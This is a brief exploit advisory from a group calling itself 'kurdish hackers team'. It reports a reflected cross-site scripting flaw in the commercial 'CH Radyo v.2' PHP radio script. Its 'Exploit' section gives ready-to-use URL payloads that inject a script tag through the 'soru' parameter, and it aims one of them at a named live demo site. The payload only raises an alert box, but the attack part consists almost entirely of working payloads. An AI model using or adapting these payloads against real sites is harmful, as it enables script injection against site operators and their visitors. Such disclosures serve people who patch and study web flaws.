===================================================== CH Radyo v.2 php script Cross Site Scripting Vulnerability ----------------------------------------------------------- foun by :kurdish hackers team group : kurd-team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- prich :59 TL (turkish mony) prich from:http://www.scripti.org/script_ch-radyo-scripti_3292_27.html demo script :http://radyo1.indircen.com (tested by Maxthon Cloud Browser , firefox) ----------------------------------------------------------- Exploit: ------- site.com/path/index.html?soru="><script>alert('explo3ter')</script> site.com/path/mplayer/index.html?soru="><script>alert('explo3ter')</script> ------- demo : http://radyo1.indircen.com/mplayer/index.html?soru="><script>alert('explo3ter')</script> ----------------------------------------------------------- Zryan_kurd ,hamw andamani p4kurd.com -----------------------------------------------------------